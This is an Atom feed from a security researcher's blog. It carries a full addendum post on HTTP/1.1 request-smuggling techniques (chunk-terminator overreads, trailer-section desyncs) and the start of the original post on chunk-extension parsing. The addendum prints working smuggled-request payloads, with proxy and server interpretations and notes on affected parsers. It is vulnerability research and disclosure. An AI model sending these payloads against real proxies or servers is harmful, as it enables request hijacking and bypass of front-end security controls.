<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.10.0">Jekyll</generator><link href="https://w4ke.info/feed.xml" rel="self" type="application/atom+xml" /><link href="https://w4ke.info/" rel="alternate" type="text/html" /><updated>2026-01-18T18:58:29+00:00</updated><id>https://w4ke.info/feed.xml</id><title type="html">w4ke.info</title><subtitle>Jeppe&apos;s place.</subtitle><author><name>Jeppe Bonde Weikop</name></author><entry><title type="html">Funky chunks – addendum: a few more dirty tricks</title><link href="https://w4ke.info/2025/10/29/funky-chunks-2.html" rel="alternate" type="text/html" title="Funky chunks – addendum: a few more dirty tricks" /><published>2025-10-29T00:00:00+00:00</published><updated>2025-10-29T00:00:00+00:00</updated><id>https://w4ke.info/2025/10/29/funky-chunks-2</id><content type="html" xml:base="https://w4ke.info/2025/10/29/funky-chunks-2.html"><![CDATA[<style>
.http-line-break {
    background-color: rgba(165, 165, 165, 0.4);
    border-radius: 4px;
    margin: 0px;
    opacity: 0.65;
}

.http-highlight {
    display: block;
    padding: 0px 4px;
    border-radius: 8px;
    margin: 0px -4px;
}

.http-highlight-head {
    display: block;
    padding: 0px 4px;
    border-radius: 1px;
    border-top-left-radius: 8px;
    border-top-right-radius: 8px;
    margin: 0px -4px;
}

.http-highlight-one {
    background-color: #ffc6bf;
}

.http-highlight-two {
    background-color: #bfd3ff;
}

.http-highlight-three {
    background-color: #ffeabf;
}

.http-highlight-one-compl {
    background-color: #ffafa6;
}

.http-highlight-two-compl {
    background-color: #a6c2ff;
}

.http-highlight-three-compl {
    background-color: #ffe1a5;
}

.http-highlight-text {
    font-size: 12px;
    font-style: italic;
    color: #555;
    float: right;
    margin-right: 2px;
    margin-top: 2px;
}

.http-highlight-text-req {
    font-size: 12px;
    font-style: italic;
    color: #555;
    float: right;
    margin-right: 0px;
    margin-top: 0px;
}

.tooltip {
    position: relative;
    display: inline-block;
    cursor: pointer;
}

td {
  vertical-align: top;
  background-color: #fbfbfb;
}

.tooltip .tooltiptext {
    visibility: hidden;
    width: 140px;
    background-color: #f9f9f9;
    color: #333;
    text-align: center;
    border: 1px solid #ddd;
    border-radius: 5px;
    padding: 5px;
    position: absolute;
    z-index: 1;
    bottom: 105%;
    left: 50%;
    margin-left: -70px;
    box-shadow: 0px 4px 6px rgba(0, 0, 0, 0.1);
    opacity: 0;
    transition: opacity 0.2s ease-in-out;
}

.tooltip:hover .tooltiptext {
    visibility: visible;
    opacity: 1;
}
</style>

<p>After revisiting my own recent article introducing a small family of request smuggling techniques, I was struck by the realization that I had not quite drawn the family tree to completion. There are still a few branches left to trace – close relatives that until now have escaped our attention. To remedy this oversight, I have put together this short addendum in which we will finally make the proper introductions and welcome these neglected smuggling techniques into the family.</p>

<p>In the interest of brevity, I will not include an introduction here. To understand the context of this article, you will therefore need to read the <a href="https://w4ke.info/2025/06/18/funky-chunks">original one</a> first.</p>

<h3 id="the-curious-case-of-the-two-byte-terminator">The curious case of the two-byte terminator</h3>
<p>In <em>Funky chunks: abusing ambiguous chunk line terminators for request smuggling</em>, we surveyed a series of HTTP/1.1 chunked-body parsing leniencies. One of them, mentioned only briefly, now turns out to be of a fundamentally different nature than the others. In fact, as we will soon see, this particular leniency unlocks an entirely new subclass of chunk-based request smuggling techniques.</p>

<p>The leniency in question is the following: <em>accepting any two bytes as the line terminator of a chunk body</em>. A parser affected by such a leniency would interpret the highlighted <code class="language-plaintext highlighter-rouge">XX</code> sequence as a line terminator in the example chunked body below.</p>

<pre><code>d<span class="http-line-break">\r\n</span>
Hello, world!<span class="http-highlight-one-compl" style="padding: 0 0px;">XX</span>
0<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
</code></pre>

<p>This is a fairly common quirk, presumably because <em>only</em> the sequence <code class="language-plaintext highlighter-rouge">\r\n</code> is valid in this location. Many parsers simply skip two bytes, not bothering to confirm that the skipped sequence is in fact a CRLF. This behavior is (or rather, <em>was</em>) exhibited by parsers such as <a href="https://github.com/python-hyper/h11">h11</a>, <a href="https://github.com/openwrt/uhttpd">uHTTPd</a>, and even older versions of <a href="https://github.com/nodejs/llhttp">llhttp</a>.</p>

<p>Now, recall another common leniency in chunk body parsing: <em>accepting a lone <code class="language-plaintext highlighter-rouge">\n</code> as a line terminator</em>, a technically incorrect yet highly prevalent behavior. Perhaps you already see where this is going.</p>

<h4 id="the-vulnerability">The vulnerability</h4>
<p>If either the front-end proxy or the back-end server assumes a two-byte CRLF without checking it, and the other accepts <code class="language-plaintext highlighter-rouge">\n</code> (or any other one-byte or zero-byte sequence) as a line terminator, <strong>chunk boundaries begin to blur</strong>. To see this, consider what happens when a chunk body with a one-byte line terminator is processed by a parser that carelessly advances two bytes after each chunk body. The parser will inadvertently consume a byte from the subsequent chunk header, effectively corrupting the chunk size. This causes the front-end and back-end parsers to disagree on the size of the next chunk, thereby enabling – <em>you guessed it</em> – HTTP request smuggling.</p>

<p>I see two variants of this new length-based technique:</p>

<ul>
  <li><strong>Front-end overread</strong>: The proxy interprets any two-byte sequence as a line terminator, and the server accepts either some one-byte line terminator (e.g. <code class="language-plaintext highlighter-rouge">\n</code>) or no line terminator at all.</li>
  <li><strong>Back-end overread</strong>: The proxy accepts either some one-byte line terminator (e.g. <code class="language-plaintext highlighter-rouge">\n</code>) or no line terminator at all, and the server interprets any two-byte sequence as a line terminator.</li>
</ul>

<p>It is worth noting that the parsing leniencies we are exploiting here are not actually any different from the ones described in my original blog post – these are just additional ways of combining leniencies to obtain a request smuggling primitive.</p>

<h4 id="example-1-byte-front-end-overread">Example: 1-byte front-end overread</h4>
<p>To keep things short, we’ll discuss only one of these variants in depth. I trust that you, dear reader, will be able to construct an equivalent attack for other variants, should the need arise.</p>

<p>Let us then consider the arguably most plausible scenario: a front-end accepting <code class="language-plaintext highlighter-rouge">\n</code> as a line terminator and a back-end accepting any two-byte sequence.</p>

<div style="max-width: 100%; overflow-x: auto;">
<div style="display: flex; gap: 10px;">
<div style="flex: 1;">

<pre><code>GET /one HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #1</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">2;<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk header</span>
</span>xx<span class="http-line-break">\n</span><span class="http-highlight-text">chunk body</span>
</span><span class="http-highlight http-highlight-two"><span class="http-highlight-head http-highlight-two-compl">50<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk header</span>
</span><span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk body</span>
GET /two HTTP/1.1<span class="http-line-break">\r\n</span>
Host: localhost<span class="http-line-break">\r\n</span>
X-Pad: AAAAA<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
</span><span class="http-highlight http-highlight-three"><span class="http-highlight-head http-highlight-three-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-line-break">\r\n</span><span class="http-highlight-text"></span>
</span></code></pre>

<p style="text-align: center; font-weight: bold;">Proxy interpretation</p>
</div>

<div style="flex: 1;">

<pre><code>GET /one HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #1</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">2;<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk header</span>
</span>xx<span class="http-line-break">\n</span>5<span class="http-highlight-text">chunk body</span>
</span><span class="http-highlight http-highlight-two"><span class="http-highlight-head http-highlight-two-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-line-break">\r\n</span><span class="http-highlight-text"></span>
</span>GET /two HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #2</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
X-Pad: AAAAA<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-line-break">\r\n</span><span class="http-highlight-text"></span>
</span></code></pre>

<p style="text-align: center; font-weight: bold;">Server interpretation</p>
</div>
</div>
</div>

<p>The front-end interprets the <code class="language-plaintext highlighter-rouge">\n</code> as a line terminator and <code class="language-plaintext highlighter-rouge">50</code> as the size of the second chunk. On the back-end, the first byte of the second chunk size is consumed by the server, assuming it to be part of the line terminator. This changes the perceived size of the second chunk from <code class="language-plaintext highlighter-rouge">50</code> to <code class="language-plaintext highlighter-rouge">0</code>, causing the server to interpret it as the end of the request. What the front-end considers the content of the second chunk is therefore interpreted as a second pipelined request on the back-end.</p>

<h3 id="funky-trailers">Funky trailers</h3>
<p>We now move on from chunks and chunk sizes and instead turn our attention to another notable feature of HTTP/1.1 chunked encoding, a feature that we foolishly ignored in the original article despite its clear applicability to our request smuggling endeavors: the <a href="https://www.rfc-editor.org/rfc/rfc9112.html#name-chunked-trailer-section">chunked trailer section</a>.</p>

<p>The trailer section is essentially an optional header section following the last chunk of an HTTP message using chunked encoding. Let’s get familiar with the syntax by taking a look at an example.</p>

<div style="max-width: 100%; overflow-x: auto;">
<div style="margin: auto; width: 420px;">
<pre><code>POST /some/path HTTP/1.1<span class="http-line-break">\r\n</span>
Host: example.com<span class="http-line-break">\r\n</span>
Content-Type: text/plain<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">d<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk header</span>
</span>hello, world!<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk body</span>
</span><span class="http-highlight http-highlight-two"><span class="http-highlight http-highlight-two-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span></span><span class="http-highlight http-highlight-three-compl">Trailer-One: value-one<span class="http-line-break">\r\n</span><span class="http-highlight-text">trailer section</span>
Trailer-Two: value-two<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span></span></code></pre>
</div>
</div>

<p>In parsing the trailer section, I’ve noticed two common approaches.</p>

<p>The first approach is to reuse the parsing logic for the header section. From a programmer’s perspective, this is a sensible choice – surely, one should not implement the same parsing logic twice! Unfortunately, there is a subtle but important difference between the headers and the trailers: <em>a lone newline is <strong>not</strong> an acceptable line terminator in the chunked trailer section.</em> As you may imagine, many parsers ignore this nuance and interpret a single <code class="language-plaintext highlighter-rouge">\n</code> as a line terminator in the trailer section anyway.</p>

<p>The second approach is to treat the trailer section much like the chunk extensions: consume it with no regard for its contents. This might seem like odd behavior, but it is a perfectly valid choice; the trailer section is optional metadata and <a href="https://www.rfc-editor.org/rfc/rfc9112.html#section-7.1.2-2:~:text=A%20recipient%20that%20removes%20the%20chunked%20coding%20from%20a%20message%20MAY%20selectively%20retain%20or%20discard%20the%20received%20trailer%20fields.">recipients are allowed to discard it</a>. Parsers employing this approach often look only for the <code class="language-plaintext highlighter-rouge">\r\n\r\n</code> sequence that marks the end of the trailer section, effectively (and erroneously) allowing any byte – including lone <code class="language-plaintext highlighter-rouge">\n</code> and <code class="language-plaintext highlighter-rouge">\r</code> characters – within the section.</p>

<p>These observations lead us to a brand-new set of exploitable parsing leniencies: by placing what one parser interprets as two consecutive line terminators in what another parser interprets as the trailer section, we have once again stumbled upon a new flavor of chunk-based request smuggling.</p>

<h4 id="trailterm">TRAIL.TERM</h4>
<p>Consider first the scenario in which the front-end proxy ignores lone <code class="language-plaintext highlighter-rouge">\n</code> characters in the chunked trailer section, but the back-end web server interprets them as line terminators. In such a scenario, we can smuggle a request past the front-end using the surprisingly simple payload below.</p>

<div style="max-width: 100%; overflow-x: auto;">
<div style="display: flex; gap: 10px;">
<div style="flex: 1;">

<pre><code>GET /one HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #1</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">2<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk header</span>
</span>xx<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk body</span>
</span><span class="http-highlight http-highlight-two-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-highlight http-highlight-three-compl"><span class="http-line-break">\n</span><span class="http-highlight-text">trailer section</span>
GET /two HTTP/1.1<span class="http-line-break">\r\n</span>
Host: localhost<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
</span></code></pre>

<p style="text-align: center; font-weight: bold;">TRAIL interpretation (proxy)</p>
</div>

<div style="flex: 1;">

<pre><code>GET /one HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #1</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">2<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk header</span>
</span>xx<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk body</span>
</span><span class="http-highlight http-highlight-two"><span class="http-highlight http-highlight-two-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-line-break">\n</span>
</span>GET /two HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #2</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
</code></pre>

<p style="text-align: center; font-weight: bold;">TERM interpretation (server)</p>
</div>
</div>
</div>

<p>The proxy ignores the lone newline following the last chunk, interpreting it as part of the trailer section. It perceives the remaining data – which the back-end interprets as a second request – as a chunked trailer section. Conveniently, the last two consecutive CRLF sequences serve both as the termination of the trailer section and the second pipelined request.</p>

<p><em><strong>Note</strong>: The first chunk is not strictly needed, but experience has taught me that some proxies rewrite requests with an empty body. The first chunk serves to prevent this rewriting behavior.</em></p>

<h4 id="termtrail">TERM.TRAIL</h4>
<p>As it turns out, the TERM.TRAIL scenario is quite a bit more complicated. Before we deep-dive into why, let’s first think about how we may construct an equivalent to the TRAIL.TERM payload above. In doing so, we quickly realize that we cannot <em>‘split’</em> a request as we usually would, because the <em>‘split’</em> can only occur on the front-end; once we add the ambiguous line terminators, the front-end interprets them as the end of the request. We have no way of splitting the request on the back-end instead.</p>

<p>There is a workaround, though: we can use <em>two</em> requests. This would perhaps more accurately be described as <em>‘request joining’</em> rather than <em>‘request splitting’</em>, because what the front-end perceives as two separate requests is squashed into a single request on the back-end – not the other way around.</p>

<div style="max-width: 100%; overflow-x: auto;">
<div style="display: flex; gap: 10px;">
<div style="flex: 1;">

<pre><code>GET /one HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #1</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">2<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk header</span>
</span>xx<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk body</span>
</span><span class="http-highlight http-highlight-two"><span class="http-highlight http-highlight-two-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-line-break">\n</span>
</span>GET /two HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #2</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Content-Length: 40<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one">GET /three HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text">request body</span>
Host: localhost<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span></span></code></pre>

<p style="text-align: center; font-weight: bold;">TERM interpretation (proxy)</p>
</div>

<div style="flex: 1;">

<pre><code>GET /one HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #1</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">2<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk header</span>
</span>xx<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk body</span>
</span><span class="http-highlight http-highlight-two-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-highlight http-highlight-three-compl"><span class="http-line-break">\n</span><span class="http-highlight-text">trailer section</span>
GET /two HTTP/1.1<span class="http-line-break">\r\n</span>
Host: localhost<span class="http-line-break">\r\n</span>
Content-Length: 40<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
</span>GET /three HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #2</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span></code></pre>

<p style="text-align: center; font-weight: bold;">TRAIL interpretation (server)</p>
</div>
</div>
</div>

<p>Using our two-request technique, it seems we yet again have managed to hide a request from the front-end parser. The back-end sees a trailer section where the front-end sees a second request, and as a result, the <code class="language-plaintext highlighter-rouge">Content-Length</code> header is ignored and the body of the second request is interpreted as a separate request on the back-end.</p>

<p>There is one major problem, however.</p>

<h4 id="the-early-response-problem">The early-response problem</h4>
<p>Consider what happens when a proxy receives these two pipelined requests. It will initially only forward what it interprets as the first request, which in turn is interpreted as an incomplete request on the back-end. Since the request is incomplete, the back-end will not return a response, and the proxy will eventually time out and therefore never forward the second request – the attack fails.</p>

<p>Until recently, I had dismissed TERM.TRAIL as unexploitable due to this inevitable upstream connection timeout. I later discovered that it <em>is</em> in fact exploitable against a small subset of web servers like AIOHTTP, Koa, and Actix Web, which respond <strong>before receiving the request body</strong> (unless the body is explicitly read by the application). Shortly after this realization, James Kettle introduced the concept of an <em><a href="https://portswigger.net/research/http1-must-die#breaking-the-0.cl-deadlock">early-response gadget</a></em> in his <a href="https://portswigger.net/research/http1-must-die">2025 HTTP desync research</a>, proving that even servers like nginx and IIS exhibit early-response behavior when rubbed the right way. We may therefore conclude that TERM.TRAIL <em>is</em> exploitable – with the added caveat that an early-response gadget is required.</p>

<p>Although Kettle’s work on early-response focused on 0.CL vulnerabilities, the idea is equally applicable to our TERM.TRAIL case; if the back-end responds early, the proxy will forward the second request, allowing the smuggled request to be delivered. It’s worth noting that unlike in 0.CL exploitation, here we do not have to worry about the lengths of any request headers added by the front-end.</p>

<h3 id="any-more-bounties">Any more bounties…?</h3>
<p>Armed with our newfound knowledge, it is only natural to wonder whether any more bounties or CVEs might be unearthed using these techniques. Unfortunately, the yields have been rather underwhelming.</p>

<p>Since the length-based techniques are only exploitable against parsing behaviors that I have already demonstrated to be dangerous, there are no additional CVEs to be issued. Scanning for these vulnerabilities across a range of bug bounty targets sadly met with little success, perhaps partly as a result of my having reported these vulnerabilities to a dozen projects months ago.</p>

<p>Regarding trailer-based techniques, TRAIL.TERM remains a theoretical vulnerability, as none of the proxies I’ve tested exhibited the required parsing behavior. I did identify multiple TERM.TRAIL-vulnerable setups, including even a couple of real-world instances in bug bounty targets, but I was unable to find the necessary early-response gadgets in most cases. The only exploitable setup I did find was AIOHTTP behind Akamai, Imperva, or Google Classic Application LB, which has now been <a href="https://github.com/aio-libs/aiohttp/security/advisories/GHSA-9548-qrrj-x5pj">fixed</a>. Google Cloud even awarded a generous $13,337 bounty for the parsing flaw in their load balancer.</p>

<p>Safe to say, these vulnerabilities are by no means as prevalent as the ones discussed in <em>Funky chunks</em>. Nonetheless, I found them interesting to include in this addendum. If you wish to go looking for these vulnerabilities in the wild yourself, I’ve updated <a href="https://github.com/JeppW/smugchunks">smugchunks</a> with more blind detection payloads.</p>]]></content><author><name>Jeppe Bonde Weikop</name></author><summary type="html"><![CDATA[]]></summary></entry><entry><title type="html">Funky chunks: abusing ambiguous chunk line terminators for request smuggling</title><link href="https://w4ke.info/2025/06/18/funky-chunks.html" rel="alternate" type="text/html" title="Funky chunks: abusing ambiguous chunk line terminators for request smuggling" /><published>2025-06-18T00:00:00+00:00</published><updated>2025-06-18T00:00:00+00:00</updated><id>https://w4ke.info/2025/06/18/funky-chunks</id><content type="html" xml:base="https://w4ke.info/2025/06/18/funky-chunks.html"><![CDATA[<style>
.http-line-break {
    background-color: rgba(165, 165, 165, 0.4);
    border-radius: 4px;
    margin: 0px;
    opacity: 0.65;
}

.http-highlight {
    display: block;
    padding: 0px 4px;
    border-radius: 8px;
    margin: 0px -4px;
}

.http-highlight-head {
    display: block;
    padding: 0px 4px;
    border-radius: 1px;
    border-top-left-radius: 8px;
    border-top-right-radius: 8px;
    margin: 0px -4px;
}

.http-highlight-one {
    background-color: #ffc6bf;
}

.http-highlight-two {
    background-color: #bfd3ff;
}

.http-highlight-three {
    background-color: #ffeabf;
}

.http-highlight-one-compl {
    background-color: #ffafa6;
}

.http-highlight-two-compl {
    background-color: #a6c2ff;
}

.http-highlight-three-compl {
    background-color: #ffe1a5;
}

.http-highlight-text {
    font-size: 12px;
    font-style: italic;
    color: #555;
    float: right;
    margin-right: 2px;
    margin-top: 2px;
}

.http-highlight-text-req {
    font-size: 12px;
    font-style: italic;
    color: #555;
    float: right;
    margin-right: 0px;
    margin-top: 0px;
}

.tooltip {
    position: relative;
    display: inline-block;
    cursor: pointer;
}

td {
  vertical-align: top;
  background-color: #fbfbfb;
}

.tooltip .tooltiptext {
    visibility: hidden;
    width: 140px;
    background-color: #f9f9f9;
    color: #333;
    text-align: center;
    border: 1px solid #ddd;
    border-radius: 5px;
    padding: 5px;
    position: absolute;
    z-index: 1;
    bottom: 105%;
    left: 50%;
    margin-left: -70px;
    box-shadow: 0px 4px 6px rgba(0, 0, 0, 0.1);
    opacity: 0;
    transition: opacity 0.2s ease-in-out;
}

.tooltip:hover .tooltiptext {
    visibility: visible;
    opacity: 1;
}
</style>

<p>The HTTP/1.1 standard seems to be riddled with strange features that absolutely no one uses and no one even really knows about. Of course, HTTP implementers with an ambition of adhering to the specification need to support these protocol quirks anyway, and unfortunately, this often results in parsing logic that is lax or incomplete – after all, why bother enforcing strict syntax rules for protocol elements that aren’t used for anything anyway?</p>

<p>In this post, we will explore how seemingly innocuous leniencies in the parsing of chunked message bodies, particularly in line terminators, can result in request smuggling vulnerabilities in widely-used servers and proxies. I will share new exploitation techniques and payloads, methods for black-box detection, and a few recent vulnerabilities found in well-known HTTP implementations.</p>

<h3 id="chunk-extensions-the-http-feature-nobody-asked-for">Chunk extensions: the HTTP feature nobody asked for</h3>
<p>We begin our journey in a strange and largely forgotten corner of the HTTP/1.1 RFC specification, a section that feels unfamiliar even to those of us who spend our days staring at HTTP requests. As you may have guessed from the title, I am referring to <a href="https://datatracker.ietf.org/doc/html/rfc9112#name-chunk-extensions">section 7.1.1</a> of <a href="https://datatracker.ietf.org/doc/html/rfc9112">RFC 9112</a>, birthplace of the <em>chunk extension</em>.</p>

<blockquote>
  <p><strong>7.1.1. Chunk Extensions</strong></p>

  <p>The chunked coding allows each chunk to include zero or more chunk extensions, immediately following the chunk-size, for the sake of supplying per-chunk metadata (such as a signature or hash), mid-message control information, or randomization of message body size.</p>

  <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> chunk-ext      = *( BWS ";" BWS chunk-ext-name
                     [ BWS "=" BWS chunk-ext-val ] )

 chunk-ext-name = token
 chunk-ext-val  = token / quoted-string
</code></pre></div>  </div>
</blockquote>

<p>Chunk extensions are an optional feature for HTTP messages using <a href="https://en.wikipedia.org/wiki/Chunked_transfer_encoding">chunked transfer encoding</a>. Before we move on to discuss chunk extensions further, let us first briefly remind ourselves of the syntax of chunked-encoding HTTP messages.</p>

<p>Chunked transfer encoding is signaled by the <code class="language-plaintext highlighter-rouge">Transfer-Encoding: chunked</code> header. In such messages, the body is divided into <em>chunks</em>, each consisting of what we may refer to as a <em>chunk header</em> and a <em>chunk body</em>, both of which are terminated by a CRLF sequence. The chunk header consists of a hexadecimal number specifying the chunk size, optionally followed by any number of semicolon-separated <em>chunk extensions</em>. The chunk body contains the actual data being delivered, its length indicated by the header. The message ends when a zero-sized chunk is encountered.</p>

<div style="max-width: 100%; overflow-x: auto;">
<div style="margin: auto; width: 420px;">
<pre><code>POST /some/path HTTP/1.1<span class="http-line-break">\r\n</span>
Host: example.com<span class="http-line-break">\r\n</span>
Content-Type: text/plain<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">9<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk header</span>
</span>some data<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk body</span>
</span><span class="http-highlight http-highlight-two"><span class="http-highlight-head http-highlight-two-compl">e;foo=bar<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk header</span>
</span>some more data<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk body</span>
</span><span class="http-highlight http-highlight-three"><span class="http-highlight-head http-highlight-three-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-line-break">\r\n</span>
</span></code></pre>
</div>
</div>

<p>Using these optional chunk extensions, a sender can attach metadata to each individual chunk they send. This is exemplified in the request above in which the metadata <code class="language-plaintext highlighter-rouge">foo=bar</code> is attached to the second chunk. To be clear, these chunk parameters are <strong>not</strong> the data delivered to the web application – they’re metainformation meant for the server processing the request.</p>

<p>So what are these chunk extensions actually used for? The answer is simple: <em>nothing</em>. No HTTP implementation makes any meaningful use of chunk extensions – servers ignore them and clients don’t send them. It seems that the protocol designers have simply anticipated a need that would never turn out to exist. To put it bluntly: <strong><em>nobody cares about chunk extensions</em></strong>.</p>

<p>Nothing makes this simple truth more apparent than reviewing the source code of a couple of HTTP implementations. A consistent behavior you’ll find is that HTTP parsers simply consume the chunk extensions, discarding the contents. I believe a common sentiment among developers tasked with writing such parsing logic is quite nicely summarized in <a href="https://github.com/golang/go/blob/1d45a7ef560a76318ed59dfdb178cecd58caf948/src/net/http/internal/chunked.go#L193-L199">this function</a> found in the net/http package of the Golang standard library.</p>

<div class="language-golang highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">func</span> <span class="n">removeChunkExtension</span><span class="p">(</span><span class="n">p</span> <span class="p">[]</span><span class="kt">byte</span><span class="p">)</span> <span class="p">([]</span><span class="kt">byte</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
	<span class="n">p</span><span class="p">,</span> <span class="n">_</span><span class="p">,</span> <span class="n">_</span> <span class="o">=</span> <span class="n">bytes</span><span class="o">.</span><span class="n">Cut</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">semi</span><span class="p">)</span>
	<span class="c">// TODO: care about exact syntax of chunk extensions? We're</span>
	<span class="c">// ignoring and stripping them anyway. For now just never</span>
	<span class="c">// return an error.</span>
	<span class="k">return</span> <span class="n">p</span><span class="p">,</span> <span class="no">nil</span>
<span class="p">}</span>
</code></pre></div></div>

<p>To an HTTP implementer, the chunk extension is indeed nothing more than a nuisance one has to account for in order to comply with the HTTP standard. However, the RFC is actually quite particular about what characters are allowed in chunk extensions and the syntax rules are not exactly straightforward. As a result, <strong>most HTTP implementations do not strictly adhere to the chunk extension specification</strong>. And this makes sense – why would they, when they’re just “ignoring and stripping them anyway”, as one Golang developer put it so aptly?</p>

<h4 id="a-thought-experiment">A thought experiment</h4>
<p>Parsers may choose to throw away chunk extensions, but they do still have to parse them. And as we’ve already established, parsers are inclined to do so somewhat carelessly, since the contents are discarded anyway. This is fertile ground for misinterpretations. Let us explore that further with a simple thought experiment.</p>

<p>Imagine that you’re an HTTP parser, dutifully working your way through a chunk header. You encounter a semicolon, signaling the start of a chunk extension. Now, in your parsing of this chunk extension (which you intend to fully ignore), you come across a lone <code class="language-plaintext highlighter-rouge">\n</code> character. This is a bit unusual, and what you’re really looking for is the CRLF terminator of the chunk header. What do you do?</p>

<ol>
  <li>
    <p><strong>Allow it</strong>: You treat the <code class="language-plaintext highlighter-rouge">\n</code> like any other byte – you ignore it and continue searching for the CRLF sequence.</p>
  </li>
  <li>
    <p><strong>Interpret it as a line terminator</strong>: The client might not be fully compliant, but they obviously intended the <code class="language-plaintext highlighter-rouge">\n</code> to be a line terminator – you interpret the <code class="language-plaintext highlighter-rouge">\n</code> as the end of the chunk header and start parsing the body.</p>
  </li>
  <li>
    <p><strong>Reject the request</strong>: This request appears to be malformed – you respond with a client error.</p>
  </li>
</ol>

<p>Let’s go through these options one by one.</p>

